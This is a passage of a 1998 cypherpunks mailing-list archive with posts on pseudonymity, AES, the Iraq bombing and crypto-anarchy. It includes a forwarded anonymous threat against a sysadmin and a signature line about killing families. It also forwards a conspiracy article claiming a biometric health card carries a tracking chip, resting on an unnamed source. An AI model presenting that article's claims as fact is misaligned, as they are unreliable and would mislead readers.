tyTdzPpGmrmyKEitnpKh0Gi4mlbT7ft3R04e3M4X1cPluEugfIkZI9ZU7K2w7Fze
ryLDCTL17Xyr3SyVisTiHORbZyc9vAbADZKKwH2M+xE+
=0GGL
-----END PGP MESSAGE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Bragg@ssa.co.uk
Date: Mon, 21 Dec 1998 19:14:01 +0800
To: cypherpunks@toad.com
Subject: Re: Forwarded mail....
Message-ID: <802566E1.0039858A.00@seunt002e.ssa.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



Comrades, comrades, please.

What makes "The Revolution" so powerful is the way it transends such petty
consideration as
"National Boundaries".

When our day comes there will be no treachery as there will be no "THEM" to
be treasonous to.  We
will be in total control.  There will be complete freedom of speech as long
as it doesn't cover topics
not suitable for public discorse (these will be desided as we need to).

Anyone can use encryption, as strong as they like.  Of course the only
computers will be centrally controlled and plain text backups will be
maintained for your peace of mind.  We will do all that tedious backing up
for you.

Anyone can own and carry any firearm.  Ammunition will naturally be
rationed.  We don't want the wealthy, bourgious <sp> to
gain an advantage over the brothers and sisters in the masses.

 Be patient comrades, our day will come.





Missouri FreeNet Administration <measl@mfn.org> on 19/12/98 05:41:51

To:   cypherpunks@toad.com
cc:    (bcc: Richard Bragg/UK/SSA_EUROPE)
Subject:  Forwarded mail....




---------- Forwarded message ----------
::Date: Sat, 19 Dec 1998 05:21:34 +0100
::From: Anonymous <nobody@replay.com>
::To: sysadmin@mfn.org

::You should be expecting a visit from the boys in the suits very soon.
::Have fun.  I hope your cellmate is a big guy they call "The Bull."

::Traitorous scum.
---------- Message Ends ----------

What I *really* love about these "patriots" is how they are not _afraid_
to stand by their words!  Awwww, c'mon!  You're on the "Side Of
Right(tm)", so why hide?  You afraid I'm gonna piss on your white picket
fence?

Yours,
J.A. Terranson
sysadmin@mfn.org

--
If Governments really want us to behave like civilized human beings, they
should give serious consideration towards setting a better example:
Ruling by force, rather than consensus; the unrestrained application of
unjust laws (which the victim-populations were never allowed input on in
the first place); the State policy of justice only for the rich and
elected; the intentional abuse and occassionally destruction of entire
populations merely to distract an already apathetic and numb electorate...
This type of demogoguery must surely wipe out the fascist United States
as surely as it wiped out the fascist Union of Soviet Socialist Republics.

The views expressed here are mine, and NOT those of my employers,
associates, or others.  Besides, if it *were* the opinion of all of
those people, I doubt there would be a problem to bitch about in the
first place...
--------------------------------------------------------------------










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 21 Dec 1998 19:19:29 +0800
To: zooko@wildgoose.tandu.com
Subject: Re: repost(?): Why i am not truly pseudonymous yet (was: Re: keyword scanning and countering writing style analysis)
In-Reply-To: <m0zrzGq-00000cC@wildgoose.ml.org>
Message-ID: <199812211059.KAA07212@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Anna Rosenbaum^H^H^H^H^H^H^H^H^H^H^H^H^H^H Zooko wrote:
> If any of you remember reading this, or have a copy of it in 
> your archives, please let me know.

A grep of my old cpunks traffic for 'Why i am not truly pseudonymous
yet' comes up empty, so apparenlty it did not get through.

> [In fact, i think i recall that about the time "Zooko" appeared
> on the scene one "Adam Back" sent me e-mail saying, "Hey--  you
> write a lot like Anna Rosenbaum did...  Are you her?".]

Yep, I recall doing this, except I did not say 'Anna Rosenbaum' but
rather your real first name, which I will of course not mention.  I
recall Tim doing the same (tho' using your initial, and on list),
also, perhaps to Zooko or perhaps to a anonymous post with writing
style and rant topic similarities.

Multiple personality nyms seem to provide some plausible deniability
and doubt, for example people like Monty Cantsin (who's web page
claimed Cantsin was any number of people) and Toto, TruthMonger
etc. whose messages signed by shared keys, or were unsigned.

I reckon there is some room for doubt as to which meat space personas
wrote some of the Toto missives for example.

Probably a good rule of thumb is never to sign anything and always
post via a mixmaster chain.  Some messages don't need a persistent nym
even.  Perhaps one could construct a zero knowledge proof of nym
reputation rating without identityfing the nym which might be useful
for filtering without linkability.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "jim finder" <jim_finder@hotmail.com>
Date: Tue, 22 Dec 1998 01:53:19 +0800
To: cypherpunks@cyberpass.net
Subject: Good archive of AES algorithms?
Message-ID: <199812211722.JAA04165@law-f54.hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



Is there a good archive of all the algorithms submitted for
AES?  I'd be interested especially in one that also had
info on what's been broken so far, plus implementations and
performance numbers. I can't find all this info on any one
site, but I can't believe that one doesn't exist.

Thanks!

Jim

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@apf2.com>
Date: Mon, 21 Dec 1998 19:21:42 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Anthrax Theatre
Message-ID: <3.0.3.32.19981221115055.006d2b60@209.204.247.83>
MIME-Version: 1.0
Content-Type: text/plain



>From: Eric Cordian <emc@wire.insync.net>
> 
>Now we have the latest incarnation of adjusting sheeple motivational
>inperatives, Anthrax Theatre.  Genuine Anthrax not required, of
>course. Yes children, see what happens because of Saddam Hussein?
>There'll be a test later, to see if further attitudinal adjustment is
>required.
>

And if that doesn't work we all know that the MIB wouldn't hesitate to
unleash a real "small scale" release just to prove that the threat really
exists!

APF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 22 Dec 1998 05:02:03 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Friedman (The Younger) Sings...
In-Reply-To: <v04020a0eb2a43f1b22a0@[139.167.130.249]>
Message-ID: <v03130300b2a45ed2af88@[209.66.101.206]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:06 AM -0800 12/21/98, Declan McCullagh wrote:
>I see Bob is incorrectly assuming that the folks at the Cato Institute knew
>nothing about cryptoanarchy before David's speech this fall...
>
>(The audience may be a different story, though.)
>

Interesting that David Friedman kept using language like:

"Some of my ideas...."

"I have developed this set of ideas..."


And yet this constellation of ideas, except for his discourse on digital
watermarking of intellectual property, is what I laid out beginning in
1988, and in thousands of essays here on this list. And in other fora.

--Tim May

We would go to their homes, and we'd kill their wives and
their children. We would kill their families
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Missouri FreeNet Administration <measl@mfn.org>
Date: Tue, 22 Dec 1998 03:20:14 +0800
To: Reeza! <howree@cable.navy.mil>
Subject: Re: I must admit. . .
In-Reply-To: <3.0.5.32.19981221234722.009bd210@205.83.192.13>
Message-ID: <Pine.BSF.3.96.981221122816.1173B-100000@greeves.mfn.org>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 21 Dec 1998, Reeza! wrote:
:At 10:03 PM 12/17/98 +0200, Jukka E Isosaari wrote:
:>Everyone is touting how he [saddam hussein, (Reeza!)] is behind every
:nasty thing that the 
:>Iraq does, so just kill or capture and imprison him. Don't take
:>it out on all the Iraqis.
:
:Make a martyr of him, in other words?
Is it better that we make martyrs of the entire population?  We are busy
starving the country out of existence right now, and he is the Head of
State: that means he understands the Rules Of The Game (all heads of state
shall serve at the pleasure of the USG, and shall be subject to elevation
or executuion at any time, and for no reason other than some USG whim).  
Taking a more formal position, i.e., The Good Of The Many, I agree the USG
should just go ahead and execute him, rather than make a policy of
deliberately toruring an entire country.  Even the Good Of The Few
arguments go in favor of this "option".

Of course, the better option would be that we mind our own business for a
change, but we all now how well *that* would go over...

:>Now, how's that for an alternative?
:
:Perfectly acceptable to me personally. Please show how it will result in
:proving that Iraq does not, and will not in the near or forseeable future
:possess weapons of mass destruction that may be utilized against
:neighbors, foreign or domestic.

*WHY* is it any of our business whether he owns weapons of *any* kind?  WE
own them, and we USE them: Does this give other nations the right to
embargo us, and to bomb us into oblivion if we refuse to allow THEM to
tell US what to do?

Our concern for his weaponry should only be an issue *IF* he uses them, as
with *OUR* weaponry.  Yours is the classical anti-gun argument, and it's
no more effective at the international level than at the state level.


: Or how it will result in turning the
:public opinion, iraqi and/or american, touted by the biased US press in
:such a fashion that it would result in a munificent display of openness,
:agreeablility, and welcoming to the UN inspectors by the iraqi hosts.
Who in the hell is the UN to force their "inspectors" on a sovereign
State?  Again, would you allow this in your home, by the USG?  It's the
same thing.

: Or
:show how Hussein is now trustworthy, and thereby qualified by the MIB
:office of the USG to possess said weapons.
The USG has no right to "qualify" any foreign nation state for the
posession of weapons - this is a right of all persons and states.

<much blathering and foaming at the jowls snipped>
:Reeza!
:DH Key available on request
Note that your DH Key is a "munition"...  Shouldn't you be "qualified" to
have it by the USG - strictly for the safety of the world, of course...


Yours, 
J.A. Terranson
sysadmin@mfn.org

--
If Governments really want us to behave like civilized human beings, they
should give serious consideration towards setting a better example:
Ruling by force, rather than consensus; the unrestrained application of
unjust laws (which the victim-populations were never allowed input on in
the first place); the State policy of justice only for the rich and 
elected; the intentional abuse and occassionally destruction of entire
populations merely to distract an already apathetic and numb electorate...
This type of demogoguery must surely wipe out the fascist United States
as surely as it wiped out the fascist Union of Soviet Socialist Republics.

The views expressed here are mine, and NOT those of my employers,
associates, or others.  Besides, if it *were* the opinion of all of
those people, I doubt there would be a problem to bitch about in the
first place...
--------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 22 Dec 1998 05:39:42 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Friedman (The Younger) Sings...
In-Reply-To: <v03130300b2a45ed2af88@[209.66.101.206]>
Message-ID: <199812212104.NAA05022@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



well I personally am very careful to credit
Timmy as the orginal originator whenever 
I lecture on cryptoanarchy, either
in person or in any "fora" hehehe. modulo whatever
BH has invented on geodesic markets or whatever.
btw I was RBLL at BH's recent rant/diatribe/harangue against
timmy (rolling in my barcolounger laughing) .. you two
truly deserve each other<g>

>And yet this constellation of ideas, except for his discourse on digital
>watermarking of intellectual property, is what I laid out beginning in
>1988, and in thousands of essays here on this list. And in other fora.
>
>--Tim May
>
>We would go to their homes, and we'd kill their wives and
>their children. We would kill their families
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
>W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
>Licensed Ontologist         | black markets, collapse of governments.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 22 Dec 1998 05:43:02 +0800
To: cypherpunks@cyberpass.net
Subject: SNET: A Little Humor
Message-ID: <199812212113.NAA06048@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: BStokes45@aol.com
Subject: SNET: A Little Humor
Date: Sun, 20 Dec 1998 18:21:38 EST
To: johnsonlm@prodigy.net, dstokes@wt.net, skeptichat@lists.sonic.net, wethepeople@onelist.com, NOEL123@juno.com, SNETNEWS@world.std.com, Roxrfun2me@aol.com


->  SNETNEWS  Mailing List



Congress' Night Before Christmas

"Twas the week before Christmas and those sly little elves,
Our congressmen, labored to better themselves.
They cared not a whit what the public might think
"Let them eat cake," some said with a wink.

And putting their thumbs to the tip of their nose,
they waved as they shouted "Anything goes!"

They scoffed at the thought that we might object,
to a tax cut for the wealthy of a posh percent.
They've got prerequisites-franking, per diem, and more --
bargain-priced haircuts and gyms (three or four!)

Paid speaking engagements and meals on the cuff,
celebrity status -- (they've sure got it tough!),

Yet they claim they're in touch with the man on the street,
as John Q. Public struggles to make both ends meet.
If all workers decided what they were due,
they'd be getting those fat paychecks too!

But while we take cutbacks or raises quite small,
and one out of 20 has no job at all,
our millionaire Congress decides on the budget
land trimming Medicare and Medicaid will do it, they say.

In this season for giving, our Congress is taking.
We've had it with them and our backs are breaking.
With hard times, disasters, and layoffs on our dockets,
we bit the bullet and they fill their pockets!

Oh jobless, oh homeless, oh desperate and needy -
dare anyone say our Congress is greedy?

If in this feeling I'm not alone,
take up your pen or pick up your phone.
As dry leaves before the wild hurricane fly,
let the road of your anger mount to the sky.

Indignant, outraged, appalled and beset
let your congressman know that you won't forget!
When election times comes -- and certain it will --
you're voting him out for passing that bill.

More rapid than eagles, their elections assured
they toasted each other and laughed at the herd.
And I heard them exclaim with adjournment at hand,

"Merry Christmas to us, and the public be damned!


The Audit
===========
A man, called to testify at the IRS, asked his accountant for advice on
what to wear.  "Wear your shabbiest clothing.  Let him think you are a
pauper," the accountant replied.  

Then he asked his lawyer the same question, but got the opposite
advice.  "Do not let them intimidate you.  Wear your most elegant suit
and tie."

Confused, the man went to his Rabbi, told him of the conflicting advice,
and requested some resolution of the dilemma.  "Let me tell you a
story," replied the Rabbi.  "A woman, about to be married, asked her
mother what to wear on her wedding night.  'Wear a heavy, long, flannel
nightgown that goes right up to your neck.'  But when she asked her best
friend, she got conflicting advice.  Wear your most sexy negligee, with
a V neck right down to your navel."

The man protested: "What does all this have to do with my problem with
the IRS?"

"No matter what you wear, you are going to get screwed."

Does anyone find it strange that we can find humor in the truth?

-> Send "subscribe   snetnews " to majordomo@world.std.com
->  Posted by: BStokes45@aol.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 22 Dec 1998 06:13:05 +0800
To: cypherpunks@cyberpass.net
Subject: SNET: [Fwd: [FP] Biometric National ID Card Now A Reality]
Message-ID: <199812212113.NAA06060@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Lynford Theobald <telnet12@burgoyne.com>
Subject: SNET: [Fwd: [FP] Biometric National ID Card Now A Reality]
Date: Mon, 21 Dec 1998 08:51:19 -0700
To: "snetnews@world.std.com" <snetnews@world.std.com>


->  SNETNEWS  Mailing List

This is a multi-part message in MIME format.
--------------408C3A349997A1C52693F214
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Here is more on the same.

LT

--------------408C3A349997A1C52693F214
Content-Type: message/rfc822
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Received: by bci for telnet12
 (with Cubic Circle's cucipop (v1.21 1997/08/10) Sun Dec 13 20:32:27 1998)
X-From_: owner-scan@efga.org  Sun Dec 13 19:03:49 1998
Return-Path: <owner-scan@efga.org>
Received: from inferno.serversystems.net (inferno.serversystems.net [207.15.209.253])
	by burgoyne.com (8.8.7/8.8.6) with ESMTP id TAA04271
	for <telnet12@burgoyne.com>; Sun, 13 Dec 1998 19:03:48 -0700
Received: (from majordomo@localhost)
	by inferno.serversystems.net (8.8.7/8.8.7) id UAA00009
	for scan-list.efga; Sun, 13 Dec 1998 20:14:22 -0500
Received: from alpha.airnet.net (page.airnet.net [207.120.51.2])
	by inferno.serversystems.net (8.8.7/8.8.7) with ESMTP id UAA00006;
	Sun, 13 Dec 1998 20:14:18 -0500
Received: from scottmcd (209.64.77.41) by alpha.airnet.net (Worldmail 1.3.167); 13 Dec 1998 19:11:29 -0600
From: "ScanThisNews" <mcdonalds@airnet.net>
To: "ScanThisNews Recipients List" <scan@efga.org>
Subject: [FP] Biometric National ID Card Now A Reality
Date: Sun, 13 Dec 1998 19:13:18 -0600
Message-ID: <000501be26fe$f051e480$294d40d1@scottmcd>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4
Importance: Normal
Sender: owner-scan@efga.org
Precedence: bulk
Reply-To: owner-scan@efga.org
X-Web-Site: http://www.efga.org/
X-Mail-List-Info: http://efga.org/about/maillist/
X-SCAN: http://www.networkusa.org/fingerprint.shtml

======================================================================
SCAN THIS NEWS
12/13/98

[forwarded from Larry Becraft]
THE BIOMETRIC NATIONAL ID CARD IS NOW A REALITY...
By Jon Christian Ryter
Author of WHATEVER HAPPENED TO AMERICA?
and THE BAFFLED CHRISTIAN'S HANDBOOK

America was rightfully alarmed in late September when Representatives Bob
Barr (R-GA) and Ron Paul (TX) revealed the fact that somehow, unbeknown to
anyone, and for some as yet unexplained reason, the National ID Card that
Hillary Clinton, Marc Tucker and Ira Magaziner had adroitly concealed in the
failed Health Security Act of 1994 had somehow "accidentally" been passed,
in a somewhat illegal and unconstitutional fashion, and was now "the law of
the land."

Pictured (see link below) is the actual "Healthcare Passport" card currently
being used in three American cities. Displayed is the front and back of that
card. This photo was scanned from the brochure used by the National
Institute of Health to introduce the new card in a seminar in Denver earlier
this year. The word "passport" on the card had to have been a
tongue-in-cheek addition, since it is the precursor of the internal passport
that will ultimately control your ability to move freely throughout this
great land. The card is biometric. Stored on this card is the complete
medical history of the card's owner. Also stored on the card is every
conceivable piece of information about that person. Imbedded in the card is
a tracking devise.

The plan to create and implement a National ID Card, while first made
"public" in a private White House meeting on Nov. 11, 1993 and discussed in
a disavowed protocol that detailed the dialogue of that meeting, is not
uniquely a Clintonoid idea even though the National ID Card first appears
innocuously concealed in the Health Security Act as a "healthcare benefits
card" that the First Lady insisted had to be carried by every American--even
if they refused to be covered by the plan--under penalty of law.

	The same card, in the form of a national driver's license, had just been
mandated by the European Union for all of the new European States. A brief
battle waged in Europe over the national driver's license. Most Europeans
had experienced national identity cards in the past and realized quickly the
new universal European driver's license was an internal passport that would
give their new government the tool they needed to control their lives. The
media immediately labeled those who resisted the EU driver's license as
"globalphobes" who were against progress, and wanted to return Europe to the
days of the cold war. They were the extremists.

	In the United States, the Clinton's knew a National ID Card spelled
problems,
regardless what name was put on it. However, as a healthcare card that
provided each American with thousands of dollars of free medical care, they
correctly surmised that the ramblings of the right wing zealots could be
easily dismissed by the mainstream liberal media. The media did its job
well.

The Health Security Act was the best thing since sliced bread and peanut
butter. According to the media, the Health Security Act would provide
healthcare for the millions upon millions of uninsured Americans. The media
even obliged by ignoring the obviously flawed cost assessments as well.

Hillary demanded that Congress pass the Health Security Act without and
changes--reminiscent of FDR's passing the "emergency legislation" that
kicked off the New Deal without allowing members of Congress to even see the
legislation they were voting on--and unconstitutionally granting Roosevelt
almost dictatorial power over the United States. Congress wasn't buying.
They read the Health Security Act. Then, they rejected it. It was, they
declared, the most expensive social experiment in the world.

Buried in the National Archives, in the working papers of the Hillary
Clinton healthcare plan, was a game plan in the event the Health Security
Act went down in flaming defeat. The game plan?  Implement another
healthcare act that provided healthcare for children.  No one would dare
deny healthcare to children. To introduce the plan, they called on Teddy
Kennedy. Kennedy failed. Kennedy, they realized, was trusted by most
Americans even less than the Clintons.

Next they turned to Orrin Hatch, who teamed up with Kennedy and rammed the
legislation through Congress. Healthcare for kids. Of course, everyone was
in favor of it. Voting against it was a good way to lose an election. And,
once the law was codified, the bureaucracy possessed the authority to simply
expand it to include anyone and everyone.

What was not in the legislation was funding to create a biometric health
care card. The authority to do it was there, but not the money. For the
money, the Clinton administration turned to the Robert Wood Johnson
Foundation. The foundation, created by the founder of Johnson & Johnson,
obliged and funded the experimental program which was kicked off in three
western cities (noted above).

What was introduced to members of the National Institute of Health in Denver
as a card that will record the inoculation records of children, includes
everything from DNA typing to that individual's medical, psychiatric and
financial history. It was because the biometric card would also contain the
psychiatric history of the cardholder that an employee of the National
Institute of Health approached me and offered me the data that is contained
in this report.

In my initial meeting with the NIH employee, I was also told that this
person had commented to a NIH executive that it was not good for the card to
contain so much personal information that was not needed to monitor the
rates of inoculation of the children covered by the program, since it would
provide the government information that could easily be misused.

At that point the NIH executive laughed and said: "What do you think we have
do with the data we get from Medicare and Medicaid? We've been using it for
years to apprehend and deport illegal aliens and to capture those wanted by
the law."

In the case of the Health Passport, which is the precursor of the National
Driver's License that will go into affect nationwide on October 1, 2000,
however, the is one added feature--it contains a tracking chip.

At a recent National Institute of Health seminar, an NIH executive proudly
displayed an electronic map created by the NIH computer technicians that
pinpointed every Health Passport card holder in Denver, Colorado. It was a
"living map" that would track each Health Passport card holder if and when
they moved. Whether or not such a map had been created for the other two
"pilot" cities is not known.

NOTE: Before I left Washington this afternoon, I spoke for about a half hour
with Stan Johnson of the Prophecy Club, and emailed Stan a copy of the Heath
Passport Card. Stan has additional information on this subject, particularly
with respect to a new computer mainframe that the government recently
installed in Denver that ties in with the information I have been receiving
from my own source in the National Institute of Health. Apparently this is
the planned topic for the Prophecy Club's radio talk show next Monday (and
because it is, I will not reveal any of the revelations that Stan shared
with me on the phone this afternoon. I would strongly urge you to visit
Stan's website for additional information.

http://www.prophecyclub.com/

---------------------------------------------
http://www.westgov.org/hpp/hpp-web.htm

HEALTH PASSPORT

A Project of the Western Governors' Association
- Frequently Asked Questions -

Introduction to the Health Passport Project

What is the Health Passport Project?

The Health Passport Project is a three-city demonstration that uses what is
called a "smart card" to put important health-related information at the
fingertips of mothers and their children. People participating in the
demonstration are those eligible for care under public health programs. The
Health Passport Project is the largest health-care demonstration in the
United States for smart cards and will be conducted over two years in the
cities of Bismarck, North Dakota; Cheyenne, Wyoming; and Reno, Nevada. The
project will demonstrate how people can use these electronic cards to give
up-to-date information to their health-care providers, including physicians,
nurses, nutritionists and early childhood educators.


Food Retailers

Grocers who handle thousands of checks for nutrition benefits will find the
new system involves less paperwork, results in quicker check-out, and
provides more timely reimbursement. The Health Passport works like a bank
card at the check-out counter. Benefits are automatically downloaded to the
client's card at the retailer. Distribution of WIC benefits will be
demonstrated in Reno and Cheyenne.


More About the Demonstrations
Which public health programs are participating?

---
Bismarck, North Dakota

The Family Doctors, Bismarck Burleigh Nursing, WIC, Head Start,
Immunizations, Medicaid, the Optimal Pregnancy Outcome Program, and Maternal
and Child Health

Bertie Bishop
(701) 255-3397

---
Cheyenne, Wyoming

Cheyenne Children's Clinic, the University of Wyoming Family Practice
Residency Center, Laramie County Public Health Nursing, Medicaid, WIC, Head
Start, Maternal and Child Health, and Immunizations

Terry Williams
(307) 777-6008

---
Reno, Nevada

WIC, Immunizations, and Head Start
Marty Brown
(702) 883-6992
-------------------------------------------------

http://www.westgov.org/hpp/

http://www.westgov.org/wga/publicat/hppsum.htm

Health Passport

Information Technology: Toward a Health Card for the West

"Congress is considering the most sweeping changes to the delivery of social
services since the New Deal. In this environment, the Health Passport
presents an innovative tool to help ensure the continued delivery of
critical services to low income women and children--even as government
sponsored programs are consolidated or eliminated. While devolution of
authority to the states is expected to reduce duplicative federal
administrative structures, the debate in Washington has done little to
provide practical solutions. The Health Passport offers a tool to help
achieve these administrative savings empowering citizens and preserving the
integrity of services."

=======================================================================
Don't believe anything you read on the Net unless:
1) you can confirm it with another source, and/or
2) it is consistent with what you already know to be true.
=======================================================================
Reply to: <fingerprint@networkusa.org>
=======================================================================
 To subscribe to the free Scan This News newsletter, send a message to
     <majordomo@efga.org> and type "subscribe scan" in the BODY.
    Or, to be removed type "unsubscribe scan" in the message BODY.
   For additional instructions see www.efga.org/about/maillist.html
-----------------------------------------------------------------------
             "Scan This News" is Sponsored by S.C.A.N.
           Host of the "FIGHT THE FINGERPRINT!" web page:
                www.networkusa.org/fingerprint.shtml
=======================================================================


--------------408C3A349997A1C52693F214--


-> Send "subscribe   snetnews " to majordomo@world.std.com
->  Posted by: Lynford Theobald <telnet12@burgoyne.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 22 Dec 1998 02:54:30 +0800
To: Digital Bearer Settlement List <cryptography@c2.net
Subject: Friedman (The Younger) Sings...
Message-ID: <v04020a0eb2a43f1b22a0@[139.167.130.249]>
MIME-Version: 1.0
Content-Type: text/plain



Wherein David Friedman teaches cryptoanarchy 101 to the folks at the Cato
Institute.

A RealAudio transcription from the Cato/Forbes ASAP conference on
cryptography held earlier this year.

Listen to this. It's important. Even if you know what he's gonna say
already, it's a very good thing to have heard so you can point newbies to
it.

Cheers,
RAH


--- begin forwarded text


To: rah@shipwright.com
Subject: up your alley
Date: Mon, 21 Dec 1998 12:11:39 -0500
From: Somebody


Have you listened to

http://www.novell.com/webcast/98/cato/crypto.ram

???

<somebody's .sig>
--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 22 Dec 1998 03:11:58 +0800
To: cypherpunks@cyberpass.net
Subject: Hayek Quote of the Week - Rule of Law
Message-ID: <v04020a0fb2a4425ee75f@[139.167.130.249]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date:         Mon, 21 Dec 1998 12:17:05 EST
Reply-To: Hayek Related Research <HAYEK-L@MAELSTROM.STJOHNS.EDU>
Sender: Hayek Related Research <HAYEK-L@MAELSTROM.STJOHNS.EDU>
From: Hayek-L List Host <HayekList@AOL.COM>
Subject:      Hayek Quote of the Week - Rule of Law
To: HAYEK-L@MAELSTROM.STJOHNS.EDU

                 Hayek Quote of the Week


"It is often not recognized that general and equal laws
provide the most effective protection against infringement
of individual liberty, this is due mainly to the habit of
tacitly exempting the state and its agents from them and
of assuming that the government has the power to
grant exemptions to individuals.  The ideal of the rule of
law requires that the state either enforce the law upon
others -- and that this be its only monopoly -- or act under
the same law and therefore be limited in the same manner
as the private person.  It is this fact that all rules apply
equally to all, including those who govern, which makes
it improbable that any oppressive rules will be adopted.

It would be humanly impossible to separate effectively the
laying-down of new general rules and their application
to particular cases unless these functions were performed
by different persons or bodies.  This part of the doctrine
of the separation of powers23 [fn23.  See W. S. Holdsworth's
review of the 9th edition of A. V. Dicey, _Constitution_, in
the _Law Quarterly Review_, Vol. LV (1939), which contains
one of the latest authoritative statements in England of the
tradition conception of the rule of law.  It deserves quotation
at length, but we will reproduce only one paragraph here:
'The rule of law is as valuable a principle today as it has ever
been.  For it means that the Courts can see to it that the
powers of officials, and official bodies of persons entrusted
with government, are not exceeded and are not abused,
and the rights of citizens are determined in accordance with
the law enacted and unenacted.  Insofar as the jurisdiction
of the Courts is ousted, and officials or official bodies of
persons are given a purely administrative discrection, the
rule of law is abrogated.  It is not abrogated if these officials
or official bodies are given a judicial or quasi-judicial
discretion, although the machinery through which the rule
is applied is not that of the Courts.'] must therefore be
regarded as an intergral part of the rule of law.  Rules must
not be made with particular cases in mind, nor must
particular cases be decided in light of anything but the
general rule -- though this rule may not yet have been
explicityly formulated and therefore have to be discovered.
This requires independent judges who are not concerned
with the temporary ends of government ,,, "


Friedrich Hayek, _The Constitution of Liberty_, Chicago:
U. of Chicago.  1960.  pp. 21-211.




Hayek Quote of the Week is a regular feature of the Hayek-L list.

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 22 Dec 1998 03:47:16 +0800
To: Robert Hettinga <cypherpunks@toad.com
Subject: Re: Friedman (The Younger) Sings...
In-Reply-To: <v04020a0eb2a43f1b22a0@[139.167.130.249]>
Message-ID: <199812211904.LAA17808@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain



I see Bob is incorrectly assuming that the folks at the Cato Institute knew
nothing about cryptoanarchy before David's speech this fall...

(The audience may be a different story, though.)

-Declan


At 01:14 PM 12-21-98 -0500, Robert Hettinga wrote:
>Wherein David Friedman teaches cryptoanarchy 101 to the folks at the Cato
>Institute.
>
>A RealAudio transcription from the Cato/Forbes ASAP conference on
>cryptography held earlier this year.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 21 Dec 1998 21:48:12 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199812211306.OAA24742@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



 ACLU: Bombing in Iraq Violates
     Constitution and War Powers Act

FOR IMMEDIATE RELEASE
Thursday, December 17, 1998

WASHINGTON -- The American Civil Liberties Union said today that the
bombing of Iraq ordered by President Clinton violates the Constitution
and the War Powers Act because it was not authorized by Congress.

Congress adopted the War Powers Act in 1973 to ensure that U.S. troops
are not sent into hostilities without Congressional authorization,
except in cases where a national emergency is created by attack upon the
United States.

"Launching a massive, sustained military assault is an action that no
one person in our democracy -- including the President -- can
authorize," said ACLU Legislative Counsel Gregory T. Nojeim, adding that
the ACLU takes no position on the use in force in Iraq.

"It is a power that the framers contemplated would be shared by Congress
and the President," Nojeim added, noting that Article I, Section 8,
Clause 11 of the Constitution grants to Congress "the power to declare
war [and] grant letters of marque and reprisal."

Under the Constitution, Congress is given the ultimate decision as to
whether to use force; the President's power is limited to decisions on
how to use the military after Congress has authorized the President to
act.

Section 2(c) of the War Powers Act states that the President has
constitutional authority to "introduce United States Armed Forces into
hostilities, or into situations where imminent involvement in
hostilities is clearly indicated by the circumstances, ... only pursuant
